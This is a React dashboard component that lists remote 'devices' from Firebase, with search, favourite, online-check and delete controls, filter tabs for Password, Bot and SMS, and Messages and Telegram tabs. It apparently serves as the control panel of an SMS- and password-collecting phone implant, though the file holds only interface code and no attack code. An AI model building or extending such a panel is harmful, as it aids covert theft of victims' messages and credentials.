import React, { useState, useCallback, useMemo, useEffect, useRef } from 'react';
import { Link, useLocation } from 'react-router-dom';
import { FixedSizeList as List } from 'react-window';
import DeviceCard from './DeviceCard';
import Messages from './Messages';
import TelegramConfig from './TelegramConfig';
import Settings from './Settings';
import { useFirebase } from '../hooks/useFirebase';
import { Search, Heart, MessageCircle, Settings as SettingsIcon, Bot, Wifi, RefreshCw } from 'lucide-react';
import '../App.css';

const Dashboard = () => {
  const location = useLocation();
  const [activeTab, setActiveTab] = useState('devices');
  const [searchTerm, setSearchTerm] = useState('');
  const [showFavoritesOnly, setShowFavoritesOnly] = useState(false);
  const [showOnlineOnly, setShowOnlineOnly] = useState(false);
  const [activeFilter, setActiveFilter] = useState('all');
  const [lastUpdate, setLastUpdate] = useState('updated now');
  const listRef = useRef(null);
  const scrollRestoredRef = useRef(false);
  const lastLocationRef = useRef(location.pathname);
  const isRestoringScrollRef = useRef(false);
  
  // Persist displayLimit in sessionStorage so it persists when navigating back
  const [displayLimit, setDisplayLimit] = useState(() => {
    const saved = sessionStorage.getItem('dashboard_displayLimit');
    return saved ? parseInt(saved, 10) : 50;
  });
  const { devices, loading, toggleFavorite, checkOnline, deleteDevice, loadMoreDevices, hasMoreDevices, refreshDevices, totalDevicesCount, getAllDevices } = useFirebase(sessionStorage.getItem('token'));

  // Update sessionStorage when displayLimit changes
  useEffect(() => {
    sessionStorage.setItem('dashboard_displayLimit', displayLimit.toString());
  }, [displayLimit]);

  // Prevent accidental page refresh/close
  useEffect(() => {
    const handleBeforeUnload = (e) => {
      // Only show confirmation if there are unsaved changes or important operations
      // You can customize this condition based on your needs
      e.preventDefault();
      e.returnValue = 'Are you sure you want to leave? Your changes may not be saved.';
      return e.returnValue;
    };

    window.addEventListener('beforeunload', handleBeforeUnload);

    return () => {
      window.removeEventListener('beforeunload', handleBeforeUnload);
    };
  }, []);

  // Get all devices from cache/map for filtering (not just loaded ones)
  const allDevicesForFilter = useMemo(() => {
    return getAllDevices ? getAllDevices() : devices;
  }, [getAllDevices, devices]);

  // Create a map of device ID to its original serial number in the full list
  const deviceSerialMap = useMemo(() => {
    const map = new Map();
    allDevicesForFilter.forEach((device, index) => {
      map.set(device.id, allDevicesForFilter.length - index);
    });
    return map;
  }, [allDevicesForFilter]);

  const filteredDevices = useMemo(() => {
    let filtered = allDevicesForFilter;
    
    // Filter by search term
    if (searchTerm) {
      filtered = filtered.filter(device => 
        device.serial?.toLowerCase().includes(searchTerm.toLowerCase()) ||
        device.id?.toLowerCase().includes(searchTerm.toLowerCase())
      );
    }
    
    // Filter by favorites if enabled
    if (showFavoritesOnly) {
      filtered = filtered.filter(device => device.favorite);
    }
    
    // Filter by online status if enabled
    if (showOnlineOnly) {
      filtered = filtered.filter(device => device.online);
    }
    
    // Apply display limit after filtering
    return filtered.slice(0, displayLimit);
  }, [allDevicesForFilter, searchTerm, showFavoritesOnly, showOnlineOnly, displayLimit]);
  
  // Calculate if there are more devices to load
  const hasMoreFilteredDevices = useMemo(() => {
    let filtered = allDevicesForFilter;
    if (searchTerm) {
      filtered = filtered.filter(device => 
        device.serial?.toLowerCase().includes(searchTerm.toLowerCase()) ||
        device.id?.toLowerCase().includes(searchTerm.toLowerCase())
      );
    }
    if (showFavoritesOnly) {
      filtered = filtered.filter(device => device.favorite);
    }
    if (showOnlineOnly) {
      filtered = filtered.filter(device => device.online);
    }
    return filtered.length > displayLimit;
  }, [allDevicesForFilter, searchTerm, showFavoritesOnly, showOnlineOnly, displayLimit]);

  // Since Dashboard never unmounts now (hidden with CSS), scroll position is automatically preserved
  // No need for scroll restoration - the list maintains its scroll position naturally
  // This effect is kept minimal - only to clear saved scroll data when showing dashboard again
  useEffect(() => {
    // When showing dashboard again (coming back from device details)
    const isShowingDashboard = location.pathname === '/dashboard' && lastLocationRef.current.startsWith('/device/');
    lastLocationRef.current = location.pathname;
    
    // Clear saved scroll data since we don't need it anymore (component never unmounted)
    if (isShowingDashboard) {
      // Component stayed mounted, scroll position is already preserved
      // Just clear any saved data
      sessionStorage.removeItem('dashboard_lastDeviceId');
      sessionStorage.removeItem('dashboard_scrollOffset');
      scrollRestoredRef.current = false;
    }
  }, [location.pathname]);
  
  // Reset scroll restored flag when filters change (user-initiated filter change)
  // This allows scroll restoration if user navigates away and comes back after changing filters
  useEffect(() => {
    // Only reset if we're on devices tab and filters actually changed
    if (activeTab === 'devices') {
      // Use a small delay to avoid resetting during the same render cycle
      const timer = setTimeout(() => {
        scrollRestoredRef.current = false;
      }, 100);
      return () => clearTimeout(timer);
    }
  }, [activeTab, searchTerm, showFavoritesOnly, showOnlineOnly]);
  
  const handleLoadMore = useCallback(() => {
    setDisplayLimit(prev => prev + 50);
  }, []);
  
  const favorites = useMemo(() => allDevicesForFilter.filter(d => d.favorite).length, [allDevicesForFilter]);
  const onlineCount = useMemo(() => allDevicesForFilter.filter(d => d.online).length, [allDevicesForFilter]);
  
  const handleToggleFavorite = useCallback((deviceId) => {
    toggleFavorite(deviceId);
  }, [toggleFavorite]);
  
  const handleCheckOnline = useCallback((deviceId) => {
    checkOnline(deviceId);
  }, [checkOnline]);
  
  const handleDelete = useCallback(async (deviceId) => {
    if (!window.confirm(`Are you sure you want to delete device ${deviceId?.slice(-8)}? This will also delete all messages for this device. This action cannot be undone.`)) {
      return;
    }
    // Delete in background - don't block UI
    deleteDevice(deviceId).then(() => {
      // Show toast notification
      const showToast = (message, type = 'info') => {
        const existingToasts = document.querySelectorAll('.toast-notification');
        existingToasts.forEach(toast => toast.remove());
        const toast = document.createElement('div');
        toast.className = `toast-notification toast-${type}`;
        toast.textContent = message;
        document.body.appendChild(toast);
        setTimeout(() => toast.classList.add('show'), 10);
        setTimeout(() => {
          toast.classList.remove('show');
          setTimeout(() => toast.remove(), 300);
        }, 3000);
      };
      showToast('Device and all messages deleted successfully', 'success');
    }).catch(error => {
      alert('Error deleting device. Please try again.');
      console.error('Delete error:', error);
    });
  }, [deleteDevice]);

  // Update last update time
  useEffect(() => {
    const updateTime = () => {
      const now = new Date();
      const timeString = now.toLocaleTimeString([], { hour: '2-digit', minute: '2-digit', second: '2-digit' });
      setLastUpdate(`updated ${timeString}`);
    };
    updateTime();
    const interval = setInterval(updateTime, 4000);
    return () => clearInterval(interval);
  }, []);

  // Handle filter changes
  const handleFilterChange = (filter) => {
    if (filter === 'favorite') {
      const newFavoriteState = !showFavoritesOnly;
      setShowFavoritesOnly(newFavoriteState);
      setShowOnlineOnly(false);
      setActiveFilter(newFavoriteState ? 'favorite' : 'all');
    } else if (filter === 'online') {
      const newOnlineState = !showOnlineOnly;
      setShowOnlineOnly(newOnlineState);
      setShowFavoritesOnly(false);
      setActiveFilter(newOnlineState ? 'online' : 'all');
    } else {
      setActiveFilter(filter);
      setShowFavoritesOnly(false);
      setShowOnlineOnly(false);
    }
  };

  return (
    <div className="phone-frame">
      <div className="dashboard">
        {/* Ultra Minimal Header */}
        <div className="header">
          {/* Stats Row - Only Total Count */}
          <div className="stats-row">
            <div className="total-stat">
              <span className="total-label">TOTAL</span>
              <span className="total-number">{totalDevicesCount || allDevicesForFilter.length}</span>
            </div>
            <div className="live-badge">
              <span className="live-dot"></span>
              LIVE
            </div>
          </div>

          {/* Filter Tabs - All in one row with full text */}
          <div className="filter-section">
            <div className="filter-tabs">
              <button 
                className={`filter-tab ${activeFilter === 'all' ? 'active' : ''}`}
                onClick={() => handleFilterChange('all')}
                data-filter="all"
              >
                All
              </button>
              <button 
                className={`filter-tab ${activeFilter === 'password' ? 'active' : ''}`}
                onClick={() => handleFilterChange('password')}
                data-filter="password"
              >
                Password
              </button>
              <button 
                className={`filter-tab ${activeFilter === 'bot' ? 'active' : ''}`}
                onClick={() => handleFilterChange('bot')}
                data-filter="bot"
              >
                Bot
              </button>
              <button 
                className={`filter-tab ${activeFilter === 'sms' ? 'active' : ''}`}
                onClick={() => handleFilterChange('sms')}
                data-filter="sms"
              >
                SMS
              </button>
              <button 
                className={`filter-tab favorite ${showFavoritesOnly ? 'active' : ''}`}
                onClick={() => handleFilterChange('favorite')}
                id="favoriteFilter"
              >
                <span className="star-icon">⭐</span>
                Favourite
              </button>
              <button 
                className={`filter-tab online ${showOnlineOnly ? 'active' : ''}`}
                onClick={() => handleFilterChange('online')}
                id="onlineFilter"
              >
                <span>⚡</span>
                Only Online
              </button>
            </div>
          </div>

          {/* Minimal Search */}
          <div className="search-container">
            <span className="search-icon">🔍</span>
            <input
              type="text"
              className="search-input"
              placeholder="Search by Device ID or Serial Number..."
              value={searchTerm}
              onChange={(e) => setSearchTerm(e.target.value)}
              id="searchInput"
            />
          </div>

          {/* Tiny Update Timestamp */}
          <div className="update-info">
            <span id="lastUpdate">{lastUpdate}</span>
          </div>
        </div>

        {/* Tab Navigation - Hidden by default, show when needed */}
        <nav className="tab-nav" style={{ display: activeTab === 'devices' ? 'none' : 'flex' }}>
          <button 
            className={activeTab === 'devices' ? 'active' : ''}
            onClick={() => setActiveTab('devices')}
          >
            Devices
          </button>
          <button 
            className={activeTab === 'messages' ? 'active' : ''}
            onClick={() => setActiveTab('messages')}
          >
            <MessageCircle size={20} />
            Messages
          </button>
          <button 
            className={activeTab === 'telegram' ? 'active' : ''}
            onClick={() => setActiveTab('telegram')}
          >
            <Bot size={20} />
            Telegram
          </button>
          <button 
            className={activeTab === 'settings' ? 'active' : ''}
            onClick={() => setActiveTab('settings')}
          >
            <SettingsIcon size={20} />
            Settings
          </button>
        </nav>

        {/* Device List */}
        <main className="dashboard-content">
          {loading && devices.length === 0 && activeTab === 'devices' && (
            <div className="loading-overlay">
              <div className="loading-spinner"></div>
            </div>
          )}
          {activeTab === 'devices' && (
            <>
              <div className="device-list" id="deviceList">
                {filteredDevices.length === 0 && !loading && (
                  <div style={{ textAlign: 'center', padding: '30px 20px', color: 'rgba(255,255,255,0.3)', fontSize: '13px' }}>
                    📱 No devices found
                  </div>
                )}
                {filteredDevices.length > 0 && (
                  <List
                    ref={listRef}
                    height={window.innerHeight - 400}
                    itemCount={filteredDevices.length}
                    itemSize={180}
                    width="100%"
                    style={{ padding: '4px' }}
                    onScroll={({ scrollOffset }) => {
                      if (!isRestoringScrollRef.current) {
                        sessionStorage.setItem('dashboard_scrollOffset', scrollOffset.toString());
                      }
                    }}
                  >
                    {({ index, style }) => {
                      const device = filteredDevices[index];
                      if (!device) return null;
                      
                      let originalSerial = deviceSerialMap.get(device.id);
                      if (originalSerial === undefined) {
                        const fullListIndex = allDevicesForFilter.findIndex(d => d.id === device.id);
                        if (fullListIndex >= 0) {
                          originalSerial = allDevicesForFilter.length - fullListIndex;
                        } else {
                          originalSerial = filteredDevices.length - index;
                          console.warn(`Device ${device.id} not found in full list, using filtered position`);
                        }
                      }
                      return (
                        <div key={device.id} style={{ ...style, paddingBottom: '8px', paddingTop: index === 0 ? '4px' : '0', paddingLeft: '4px', paddingRight: '4px' }}>
                          <Link 
                            to={`/device/${device.id}#sms`} 
                            style={{ 
                              textDecoration: 'none', 
                              color: 'inherit', 
                              display: 'block', 
                              height: '100%',
                              pointerEvents: 'auto'
                            }}
                            onClick={(e) => {
                              const clickedButton = e.target.closest('.favorite-btn') || 
                                                   e.target.closest('.check-online-btn') ||
                                                   e.target.closest('button');
                              if (clickedButton && (clickedButton.classList.contains('favorite-btn') || 
                                                    clickedButton.classList.contains('check-online-btn'))) {
                                e.preventDefault();
                                e.stopPropagation();
                                return false;
                              }
                              scrollRestoredRef.current = false;
                              sessionStorage.setItem('dashboard_lastDeviceId', device.id);
                              if (listRef.current) {
                                try {
                                  const scrollOffset = listRef.current.state?.scrollOffset || 0;
                                  sessionStorage.setItem('dashboard_scrollOffset', scrollOffset.toString());
                                } catch (err) {
                                  console.warn('Could not get scroll offset:', err);
                                }
                              }
                            }}
                          >
                            <DeviceCard
                              device={device}
                              serial={originalSerial}
                              onCheckOnline={() => handleCheckOnline(device.id)}
                              onToggleFavorite={() => handleToggleFavorite(device.id)}
                              onDelete={() => handleDelete(device.id)}
                            />
                          </Link>
                        </div>
                      );
                    }}
                  </List>
                )}
                {hasMoreFilteredDevices && (
                  <div style={{ 
                    display: 'flex', 
                    justifyContent: 'center', 
                    alignItems: 'center',
                    padding: '20px',
                    gap: '12px',
                    flexDirection: 'column'
                  }}>
                    <span style={{ color: 'rgba(255,255,255,0.5)', fontSize: '12px' }}>
                      Showing {filteredDevices.length} of {(() => {
                        let filtered = allDevicesForFilter;
                        if (searchTerm) {
                          filtered = filtered.filter(device => 
                            device.serial?.toLowerCase().includes(searchTerm.toLowerCase()) ||
                            device.id?.toLowerCase().includes(searchTerm.toLowerCase())
                          );
                        }
                        if (showFavoritesOnly) {
                          filtered = filtered.filter(device => device.favorite);
                        }
                        if (showOnlineOnly) {
                          filtered = filtered.filter(device => device.online);
                        }
                        return filtered.length;
                      })()} devices
                    </span>
                    <button
                      onClick={handleLoadMore}
                      style={{
                        padding: '8px 16px',
                        background: 'rgba(168, 85, 247, 0.2)',
                        color: 'rgba(255,255,255,0.8)',
                        border: '1px solid rgba(168, 85, 247, 0.3)',
                        borderRadius: '20px',
                        fontSize: '12px',
                        fontWeight: '500',
                        cursor: 'pointer',
                        transition: 'all 0.3s ease'
                      }}
                    >
                      Load More
                    </button>
                  </div>
                )}
              </div>
            </>
          )}

          {activeTab === 'messages' && <Messages />}
          {activeTab === 'telegram' && <TelegramConfig />}
          {activeTab === 'settings' && <Settings />}
        </main>

        {/* Minimal Footer - Just refresh button */}
        {activeTab === 'devices' && (
          <div className="footer">
            <button 
              className="refresh-footer-btn" 
              id="refreshBtn"
              onClick={() => {
                refreshDevices();
                const btn = document.getElementById('refreshBtn');
                if (btn) {
                  btn.style.transform = 'rotate(180deg)';
                  setTimeout(() => {
                    btn.style.transform = '';
                  }, 300);
                }
              }}
              disabled={loading}
            >
              <span>↻</span>
              Refresh
            </button>
          </div>
        )}
      </div>
    </div>
  );
};

export default Dashboard;
